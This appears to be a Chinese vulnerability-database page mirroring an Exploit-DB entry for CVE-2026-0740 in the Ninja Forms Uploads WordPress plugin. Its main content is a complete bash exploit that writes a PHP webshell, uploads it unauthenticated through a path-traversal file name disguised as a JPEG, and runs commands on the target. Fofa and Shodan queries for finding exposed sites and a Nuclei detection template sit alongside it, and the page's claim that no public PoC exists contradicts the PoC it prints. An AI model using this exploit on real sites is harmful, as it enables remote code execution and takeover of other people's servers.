[webapps] Ninja Forms Uploads - Unauthenticated PHP File Upload
CVE-2026-0740
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2026-0740 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-05-13 |
| 提交者 | Sélim Lanouar (@whattheslime) |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ 原始 PoC
# Exploit Author: Sélim Lanouar (@whattheslime)
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <target_url>"
exit 1
fi
target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name
echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
-d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"
echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
-F "action=nf_fu_upload" \
-F "nonce=$nonce" \
-F "form_id=$field_id" \
-F "field_id=$field_id" \
-F "image_jpg=../../../$file_name" \
-F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"
command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-0740-detection
info:
name: Ninja Forms Uploads - Version Detection
author: exploitdb
severity: medium
description: |
Ninja Forms Uploads plugin version 3.3.24 is vulnerable to unauthenticated PHP file upload.
This detection template checks for the presence of the file-uploads add-on and its version.
reference:
- https://ninjaforms.com/extensions/file-uploads/
tags: wordpress,plugin,ninja-forms,file-uploads,cve,cve2026
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ninja-forms-uploads/readme.txt"
- "{{BaseURL}}/wp-content/plugins/ninja-forms-uploads/ninja-forms-uploads.php"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Stable tag: 3.3.24"
- "Stable tag: 3.3.23"
- "Stable tag: 3.3.22"
- "Stable tag: 3.3.21"
- "Stable tag: 3.3.20"
condition: or
- type: word
part: body
words:
- "Ninja Forms Uploads"
- "nf-fu-uploads"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- 'Stable tag: ([0-9]+\.[0-9]+\.[0-9]+)'
- 'Version: ([0-9]+\.[0-9]+\.[0-9]+)'🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-18 21:54 | 来源: Exploit-DB